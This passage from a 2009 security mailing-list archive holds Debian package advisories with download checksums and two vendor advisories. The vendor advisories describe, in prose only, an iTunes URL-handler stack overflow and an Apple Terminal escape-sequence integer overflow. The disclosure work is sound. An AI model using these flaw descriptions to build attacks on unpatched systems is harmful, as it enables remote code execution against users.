http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.26-2+lenny1_ia64.deb Size/MD5 checksum: 168168 fc402d0ecfb2cf96fb1600633772e418 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.26-2+lenny1_mips.deb Size/MD5 checksum: 111094 fe05eaac643aa26a9ca1ec755daa36ae mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.26-2+lenny1_mipsel.deb Size/MD5 checksum: 110106 e037fea37091598bbbd6a0530b090e9c powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.26-2+lenny1_powerpc.deb Size/MD5 checksum: 121816 f6be93aeec7aea7f10dac6c056086324 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.26-2+lenny1_s390.deb Size/MD5 checksum: 129412 f3373807d3f321bd6d38b7fcdc4dad8f sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/liba/libapache-mod-jk/libapache2-mod-jk_1.2.26-2+lenny1_sparc.deb Size/MD5 checksum: 118514 3966e3f51da1b24f5fb45c6775c04918 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkolf4MACgkQXm3vHE4uylpOsgCgrr0TyLq4yacpmQoJUQrR3lVD 8GYAoJxTBg46ltOyMxDKH/tVmwq/bNVI =rsv8 -----END PGP SIGNATURE----- From dvlabs at tippingpoint.com Tue Jun 2 21:27:05 2009 From: dvlabs at tippingpoint.com (dvlabs) Date: Tue, 2 Jun 2009 15:27:05 -0500 Subject: [Full-disclosure] TPTI-09-03: Apple iTunes Multiple Protocol Handler Buffer Overflow Vulnerabilities Message-ID: <C64AF549.17CE6%dvlabs@tippingpoint.com> TPTI-09-03: Apple iTunes Multiple Protocol Handler Buffer Overflow Vulnerabilities http://dvlabs.tippingpoint.com/advisory/TPTI-09-03 June 2, 2009 -- CVE ID: CVE-2009-0950 -- Affected Vendors: Apple -- Affected Products: Apple iTunes -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8013. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple iTunes. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists in the URL handlers associated with iTunes. When processing URLs via the protocol handlers "itms", "itmss", "daap", "pcast", and "itpc" an exploitable stack overflow occurs. Successful exploitation can lead to a remote system compromise under the credentials of the currently logged in user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT3592 -- Disclosure Timeline: 2009-04-09 - Vulnerability reported to vendor 2009-06-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * James King, TippingPoint DVLabs From dvlabs at tippingpoint.com Tue Jun 2 21:27:07 2009 From: dvlabs at tippingpoint.com (dvlabs) Date: Tue, 2 Jun 2009 15:27:07 -0500 Subject: [Full-disclosure] TPTI-09-04: Apple Terminal xterm Resize Escape Sequence Memory Corruption Vulnerability Message-ID: <C64AF54B.17CE7%dvlabs@tippingpoint.com> TPTI-09-04: Apple Terminal xterm Resize Escape Sequence Memory Corruption Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-09-04 June 2, 2009 -- CVE ID: CVE-2009-1717 -- Affected Vendors: Apple -- Affected Products: Apple OS X -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8152. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Terminal. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists in the handling of 'CSI[4' xterm window resizing escape code. When a very low negative value for (x, y) size is set, an integer overflow occurs resulting in a memory corruption. This can be further leveraged to execute arbitrary code under the context of the logged in user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT3549 -- Disclosure Timeline: 2009-05-06 - Vulnerability reported to vendor 2009-06-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * James King, TippingPoint DVLabs From nion at debian.org Tue Jun 2 21:58:55 2009 From: nion at debian.org (Nico Golde) Date: Tue, 2 Jun 2009 22:58:55 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1810-1] New cups/cupsys packages fix denial of service Message-ID: <20090602205855.GA25100@ngolde.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA-1810-1 security at debian.org http://www.debian.org/security/ Nico Golde June 2nd, 2009 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : cups, cupsys Vulnerability : null ptr dereference Problem type : remote Debian-specific: no CVE ID : CVE-2009-0949 Anibal Sacco discovered that cups, a general printing system for UNIX systems, suffers from null pointer dereference because of its handling of two consecutive IPP packets with certain tag attributes that are treated as IPP_TAG_UNSUPPORTED tags. This allows unauthenticated attackers to perform denial of service attacks by crashing the cups daemon. For the oldstable distribution (etch), this problem has been fixed in version 1.2.7-4+etch8 of cupsys. For the stable distribution (lenny), this problem has been fixed in version 1.3.8-1+lenny6 of cups. For the testing distribution (squeeze), this problem will be fixed soon. For the unstable distribution (sid), this problem will be fixed soon. We recommend that you upgrade your cups/cupsys packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian (oldstable) - ------------------ Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7.orig.tar.gz Size/MD5 checksum: 4214272 c9ba33356e5bb93efbcf77b6e142e498 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4+etch8.dsc Size/MD5 checksum: 1094 42b2e4d0d1709d31270cbd0361ded3f4 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4+etch8.diff.gz Size/MD5 checksum: 109744 c73260161da939be7517c6ff0c5493cb Architecture independent packages: http://security.debian.org/pool/updates/main/c/cupsys/cupsys-common_1.2.7-4+etch8_all.deb Size/MD5 checksum: 921366 4cec0d4b82b768bd42c801e87831eec9 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-gnutls10_1.2.7-4+etch8_all.deb Size/MD5 checksum: 46424 bc032e7d1c4520843b540d3bb238d3a3 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4+etch8_alpha.deb Size/MD5 checksum: 72856 a2c626b3f8dd8e43cecc395c5cf9ef03 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4+etch8_alpha.deb Size/MD5 checksum: 1614886 8286658ca407d05ecc87ea4cd2dc870a http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4+etch8_alpha.deb Size/MD5 checksum: 183730 f2c644de893bf0ca28868cfecefca04d http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4+etch8_alpha.deb Size/MD5 checksum: 85916 7233e6ec6bb857653d2829cd80012d41 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4+etch8_alpha.deb Size/MD5 checksum: 1093518 e6544fc0edd973d09a1e00652991845b http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4+etch8_alpha.deb Size/MD5 checksum: 96030 23aca27ae72c081612fb247cfd9e33da http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4+etch8_alpha.deb Size/MD5 checksum: 39332 a931e92b73c1004f4c8ed110c01ac728 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4+etch8_alpha.deb Size/MD5 checksum: 175552 8bb48e7fdb170d74a14e65aecee3b230 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4+etch8_amd64.deb Size/MD5 checksum: 1087540 1e71685c6620845318d49cf1fcf5feb0 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4+etch8_amd64.deb Size/MD5 checksum: 87128 281a245270d6c2dcd7f0e1a6fc7d0b12 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4+etch8_amd64.deb Size/MD5 checksum: 37572 c0491559f8465d610a0577cc23f00de5 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4+etch8_amd64.deb Size/MD5 checksum: 162892 42d1cf5ceaa5ed7a95f16b869e6df97f http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4+etch8_amd64.deb Size/MD5 checksum: 80862 511e522206e17f759cd7c56e934f08bd http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4+etch8_amd64.deb Size/MD5 checksum: 1572040 e2582ab015e6e3a3858b713d6f159a34 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4+etch8_amd64.deb Size/MD5 checksum: 53056 d4c82327123ddc2c0e48c804634603ae http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4+etch8_amd64.deb Size/MD5 checksum: 142418 d9314cb33230b9c6dbe571671b14adda arm architecture (ARM) http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4+etch8_arm.deb Size/MD5 checksum: 1023048 8b559f55ae312c59e22a113fd6928c5f http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4+etch8_arm.deb Size/MD5 checksum: 36758 cb2e80f86795f10af3fc100aa4506def http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4+etch8_arm.deb Size/MD5 checksum: 1567912 776f4974949a31b3facd38b302b8097a http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4+etch8_arm.deb Size/MD5 checksum: 78698 6122e3902076dd2c3247dd4b5a56a660 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4+etch8_arm.deb Size/MD5 checksum: 48958 92730848f69e8540412fdf8bdfb96c1f http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4+etch8_arm.deb Size/MD5 checksum: 85496 230c5b107dff69eca6f8d6241277a95f http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4+etch8_arm.deb Size/MD5 checksum: 154962 8803b8b5ac7a11e3a2cf5a40f389d049 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4+etch8_arm.deb Size/MD5 checksum: 131674 22e1a6767fc65ac920a5ce245743f9fd hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4+etch8_hppa.deb Size/MD5 checksum: 154688 26ee139a8daabd621479d73ac2d04a16 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4+etch8_hppa.deb Size/MD5 checksum: 1628398 beed29d0d6a15e33a83206acf3380cce http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4+etch8_hppa.deb Size/MD5 checksum: 57246 07d89a1799a8b8daf3fb13f8c0b155d3 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4+etch8_hppa.deb Size/MD5 checksum: 86802 f4e4a831a178e7e9df1f66a3af3633fb http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4+etch8_hppa.deb Size/MD5 checksum: 172252 78031fa93b94ba44187e0986e82d6201 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4+etch8_hppa.deb Size/MD5 checksum: 40370 b203925426b9411027184af8af2f73d6 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4+etch8_hppa.deb Size/MD5 checksum: 1037196 85cd25d326e4535a9a18921e1016788d http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4+etch8_hppa.deb Size/MD5 checksum: 91586 1ef7a9dd2be035a8504bd124e1da385d i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4+etch8_i386.deb Size/MD5 checksum: 137728 7f9d176b0cb1e5976ea06e58526a60f4 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4+etch8_i386.deb Size/MD5 checksum: 87336 3b3b4ffad78f35ffc5e05941bdfc15bd http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4+etch8_i386.deb Size/MD5 checksum: 37416 3513b7cef1c51a35efd9ffd3c294e14d http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4+etch8_i386.deb Size/MD5 checksum: 1000830 28dedcb611ed0538308122b860ba58c8 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4+etch8_i386.deb Size/MD5 checksum: 53206 d0ae9184a84597d989b69fe7e25bc470 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4+etch8_i386.deb Size/MD5 checksum: 1560356 5a8dc9c147a9d5c82224478f64731f0f http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4+etch8_i386.deb Size/MD5 checksum: 79744 40326a8b68de9dbe6987e39fe95a13f8 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4+etch8_i386.deb Size/MD5 checksum: 160956 da17f9d144495fde4e4c8bbad95560e8 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4+etch8_ia64.deb Size/MD5 checksum: 106218 609f68aa16bfd657583e8be99a2ad0c1 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4+etch8_ia64.deb Size/MD5 checksum: 74386 f0259501885d635d40aab9308a1bfbf3 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4+etch8_ia64.deb Size/MD5 checksum: 192362 9009b4a91e64ab0a1c325bcaec97c2e0 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4+etch8_ia64.deb Size/MD5 checksum: 1108908 1db7bb18903f47d5de29482709e3ff78 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4+etch8_ia64.deb Size/MD5 checksum: 1771178 f104a7cc65ef288cd7758bb2175709a0 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4+etch8_ia64.deb Size/MD5 checksum: 204522 8628cbc5cf2b22ed1d4eaeda2d7b4a60 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4+etch8_ia64.deb Size/MD5 checksum: 46334 726f90dd146cd9d2d6ad964c0e718585 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4+etch8_ia64.deb Size/MD5 checksum: 107424 c3c93da377fee4bf48f57778b305d5db mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4+etch8_mips.deb Size/MD5 checksum: 1098528 5a9e021f7509cbde95ef66da819c3228 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4+etch8_mips.deb Size/MD5 checksum: 150986 db510250f4f5aac631a743f04dc8054d http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4+etch8_mips.deb Size/MD5 checksum: 36124 d8663fcdd8acb88018af29a3af61c9f6 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4+etch8_mips.deb Size/MD5 checksum: 158310 776e9b5f14047779211e1262ae9f62d0 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4+etch8_mips.deb Size/MD5 checksum: 76166 26a80a28871b162d72c2469a18ce6966 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4+etch8_mips.deb Size/MD5 checksum: 87110 f71b2aa6af126f5ae434e1381126fc34 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4+etch8_mips.deb Size/MD5 checksum: 1568290 ad4192ffb0d477ae964f6c3b039e52ac http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4+etch8_mips.deb Size/MD5 checksum: 57678 da4e6ba9b1a61ad4bdc6a8e8d682fc61 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4+etch8_mipsel.deb Size/MD5 checksum: 87254 e2917b072751a45afba30498006b71c3 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4+etch8_mipsel.deb Size/MD5 checksum: 150894 09067f14c0938ef6dbeb500256dd42f9 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4+etch8_mipsel.deb Size/MD5 checksum: 1553678 c4168376ca4d74744e24be76ec159067 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4+etch8_mipsel.deb Size/MD5 checksum: 158842 f6d3053079e08de8e617272fd4a8489d http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4+etch8_mipsel.deb Size/MD5 checksum: 1086490 e82ba4868d85ad36861a8aff82f6f72a http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4+etch8_mipsel.deb Size/MD5 checksum: 36070 c67551d542db6a7b5081b8f0e1bdf30e http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4+etch8_mipsel.deb Size/MD5 checksum: 57804 fa0c855349bfa38f31c82e83374ccdab http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4+etch8_mipsel.deb Size/MD5 checksum: 77446 936b8d1173c259822d9e5ae3e82eb357 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4+etch8_powerpc.deb Size/MD5 checksum: 41342 f5d1131ddc30cb780322237c47411177 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4+etch8_powerpc.deb Size/MD5 checksum: 1147440 23944aceda9e865a4aab581509bb4058 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4+etch8_powerpc.deb Size/MD5 checksum: 89404 9a0198042c3eb4ef053f720d20706c34 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4+etch8_powerpc.deb Size/MD5 checksum: 163446 75275152a9b69f479d4b0c6ae8fb3fa0 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4+etch8_powerpc.deb Size/MD5 checksum: 1582758 4544b9bc4aaf231fe604449311f118b9 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4+etch8_powerpc.deb Size/MD5 checksum: 89574 942740b75d722b0fcbf284bc05035e48 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4+etch8_powerpc.deb Size/MD5 checksum: 136242 5ef0278b80c263897d8942f9bc03631e http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4+etch8_powerpc.deb Size/MD5 checksum: 51926 a35183dcb7bc3a0490b2ee1d8ed5ab3d s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4+etch8_s390.deb Size/MD5 checksum: 82334 745d2f27c678f02ad011fa15f1731560 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4+etch8_s390.deb Size/MD5 checksum: 1587692 d3c2245878121c7c16752f2b9949d0dc http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4+etch8_s390.deb Size/MD5 checksum: 166998 64e5615906a50a2c19ee5359a521a9f6 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4+etch8_s390.deb Size/MD5 checksum: 52522 199020914a0d52a771d112c6b2823de8 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4+etch8_s390.deb Size/MD5 checksum: 1037546 89b9f600cc2a513678446a2a2fcb5b81 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4+etch8_s390.deb Size/MD5 checksum: 88194 b376557a4f613fb65f46cbfae42050bf http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4+etch8_s390.deb Size/MD5 checksum: 144934 da63d5b24df68891c2806f0f514911e6 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4+etch8_s390.deb Size/MD5 checksum: 37422 3b0a8733a1ef7bf6fae8f00bb306bceb sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4+etch8_sparc.deb Size/MD5 checksum: 78608 fb366ff39679d91c983deb2022ec0f0c http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4+etch8_sparc.deb Size/MD5 checksum: 159716 eb0065adeacdf8a7f23098195a515e03 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4+etch8_sparc.deb Size/MD5 checksum: 86066 5c0f9c078202fbf4c2f9c7cae3c89057 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4+etch8_sparc.deb Size/MD5 checksum: 1578044 a94273670520f2db0fd4767ecb93cc4c http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4+etch8_sparc.deb Size/MD5 checksum: 36060 b54d8ba11e9f8fd155e0b29f1609ebcd http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4+etch8_sparc.deb Size/MD5 checksum: 51832 cb3bf2ee0f2d4661cd8198f8da780d00 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4+etch8_sparc.deb Size/MD5 checksum: 996840 5609f09834fb8eecc031ad52bb1ba550 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4+etch8_sparc.deb Size/MD5 checksum: 138744 5e701d9b2c7941e857c143e7289c3a20 Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/c/cups/cups_1.3.8-1+lenny6.diff.gz Size/MD5 checksum: 185068 01548b71a9c9f8f3cd4c4e38be162e0c http://security.debian.org/pool/updates/main/c/cups/cups_1.3.8-1+lenny6.dsc Size/MD5 checksum: 1837 74c7cc9607928673ef30937fa74d154c http://security.debian.org/pool/updates/main/c/cups/cups_1.3.8.orig.tar.gz Size/MD5 checksum: 4796827 10efe9825c1a1dcd325be47a6cc21faf Architecture independent packages: http://security.debian.org/pool/updates/main/c/cups/cupsys_1.3.8-1+lenny6_all.deb Size/MD5 checksum: 52146 7e655df3208e7b1c14e963e62d2a1f9e http://security.debian.org/pool/updates/main/c/cups/libcupsys2-dev_1.3.8-1+lenny6_all.deb Size/MD5 checksum: 52174 ca30676d4f14b19d69f07948ec920645 http://security.debian.org/pool/updates/main/c/cups/cupsys-client_1.3.8-1+lenny6_all.deb Size/MD5 checksum: 52172 0745ebb9d35b06b2baed0946c9c4cdf4 http://security.debian.org/pool/updates/main/c/cups/cupsys-dbg_1.3.8-1+lenny6_all.deb Size/MD5 checksum: 52162 39dda2a8979e6d53d369a850a7287f98 http://security.debian.org/pool/updates/main/c/cups/cupsys-bsd_1.3.8-1+lenny6_all.deb Size/MD5 checksum: 52162 185cdcccb15621495bb4dd922824fb27 http://security.debian.org/pool/updates/main/c/cups/cupsys-common_1.3.8-1+lenny6_all.deb Size/MD5 checksum: 52162 7cfc925b6070373cb03f50e28ffcb5eb http://security.debian.org/pool/updates/main/c/cups/cups-common_1.3.8-1+lenny6_all.deb Size/MD5 checksum: 1180808 ab548a8679a470d91055cb14a524f019 http://security.debian.org/pool/updates/main/c/cups/libcupsys2_1.3.8-1+lenny6_all.deb Size/MD5 checksum: 52166 808680daaacf24e6969a46b5821c05b4 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/c/cups/cups-bsd_1.3.8-1+lenny6_alpha.deb Size/MD5 checksum: 37990 1d176c775ae611d5de6fc28debeac312 http://security.debian.org/pool/updates/main/c/cups/libcupsimage2_1.3.8-1+lenny6_alpha.deb Size/MD5 checksum: 108462 bee5be572e1c162c31a2f2cb6fccd95b http://security.debian.org/pool/updates/main/c/cups/cups-client_1.3.8-1+lenny6_alpha.deb Size/MD5 checksum: 118450 c6848af4b97d419426046f53c0a10c8b http://security.debian.org/pool/updates/main/c/cups/libcups2-dev_1.3.8-1+lenny6_alpha.deb Size/MD5 checksum: 445916 a291be3dfa900c17126ce9796d71db2a http://security.debian.org/pool/updates/main/c/cups/cups_1.3.8-1+lenny6_alpha.deb Size/MD5 checksum: 2099172 fabc17ee844d661b518a4c35321c5128 http://security.debian.org/pool/updates/main/c/cups/cups-dbg_1.3.8-1+lenny6_alpha.deb Size/MD5 checksum: 1142836 46addc9aade19f27e42b443768023f94 http://security.debian.org/pool/updates/main/c/cups/libcups2_1.3.8-1+lenny6_alpha.deb Size/MD5 checksum: 179128 0c7440b785436020854b72114e9e7686 http://security.debian.org/pool/updates/main/c/cups/libcupsimage2-dev_1.3.8-1+lenny6_alpha.deb Size/MD5 checksum: 81496 5235f6c116886ee493467ff1e52dff9f amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/c/cups/libcups2_1.3.8-1+lenny6_amd64.deb Size/MD5 checksum: 168874 34599b5781a04df793603da238d30224 http://security.debian.org/pool/updates/main/c/cups/libcupsimage2-dev_1.3.8-1+lenny6_amd64.deb Size/MD5 checksum: 61012 fcd44c54190e1f2212335b0f971b2241 http://security.debian.org/pool/updates/main/c/cups/cups-dbg_1.3.8-1+lenny6_amd64.deb Size/MD5 checksum: 1197270 584dbf166833f9f50a43137f1e2c04f7 http://security.debian.org/pool/updates/main/c/cups/cups_1.3.8-1+lenny6_amd64.deb Size/MD5 checksum: 2070558 64782a03e7391d3b983fe918b6d416a6 http://security.debian.org/pool/updates/main/c/cups/cups-client_1.3.8-1+lenny6_amd64.deb Size/MD5 checksum: 116780 317905cae4f2ba4acbdb62cc46b87e2a http://security.debian.org/pool/updates/main/c/cups/libcups2-dev_1.3.8-1+lenny6_amd64.deb Size/MD5 checksum: 401290 bdd244d1e6559d959eb803f8bd6abbf2 http://security.debian.org/pool/updates/main/c/cups/cups-bsd_1.3.8-1+lenny6_amd64.deb Size/MD5 checksum: 37236 b3642bfa15ff0fe3c6d983e031275da6 http://security.debian.org/pool/updates/main/c/cups/libcupsimage2_1.3.8-1+lenny6_amd64.deb Size/MD5 checksum: 99702 17dbaea17495777f8ba8a2996acc3725 arm architecture (ARM) http://security.debian.org/pool/updates/main/c/cups/libcups2-dev_1.3.8-1+lenny6_arm.deb Size/MD5 checksum: 387466 6ac7763fc0ade8a3703104cdd3c3357a http://security.debian.org/pool/updates/main/c/cups/libcupsimage2_1.3.8-1+lenny6_arm.deb Size/MD5 checksum: 97190 e274997fb4e49c281c21549b1120efb2 http://security.debian.org/pool/updates/main/c/cups/cups-client_1.3.8-1+lenny6_arm.deb Size/MD5 checksum: 113164 eaa19c4d0964cd38613ab2c58f07ce26 http://security.debian.org/pool/updates/main/c/cups/cups_1.3.8-1+lenny6_arm.deb Size/MD5 checksum: 2059026 ee1367a147b8c07bae9c87ccc87c4998 http://security.debian.org/pool/updates/main/c/cups/libcupsimage2-dev_1.3.8-1+lenny6_arm.deb Size/MD5 checksum: 55342 c57db0444dc9193f0ab35e1a934400ec http://security.debian.org/pool/updates/main/c/cups/libcups2_1.3.8-1+lenny6_arm.deb Size/MD5 checksum: 155270 5f0300fb74cb89f6b9b7bb45537f4aec http://security.debian.org/pool/updates/main/c/cups/cups-dbg_1.3.8-1+lenny6_arm.deb Size/MD5 checksum: 1123418 df0367cba01ba9919f409b022dbe7c1b http://security.debian.org/pool/updates/main/c/cups/cups-bsd_1.3.8-1+lenny6_arm.deb Size/MD5 checksum: 36484 7294561d854c324dc268c8fb0d616a2a armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/c/cups/cups-dbg_1.3.8-1+lenny6_armel.deb Size/MD5 checksum: 1128236 5fb35a72133c870e444fe0b1250db6b2 http://security.debian.org/pool/updates/main/c/cups/cups-bsd_1.3.8-1+lenny6_armel.deb Size/MD5 checksum: 38752 777da1a892c9d354f5e1ae2575b97d47 http://security.debian.org/pool/updates/main/c/cups/cups_1.3.8-1+lenny6_armel.deb Size/MD5 checksum: 2075760 a850581323f50e10ded793a321763a39 http://security.debian.org/pool/updates/main/c/cups/libcups2-dev_1.3.8-1+lenny6_armel.deb Size/MD5 checksum: 387318 64dc6d3b023d3de8a9ad99c244555008 http://security.debian.org/pool/updates/main/c/cups/libcupsimage2_1.3.8-1+lenny6_armel.deb Size/MD5 checksum: 98356 96861930db8e85257fa250312839d177 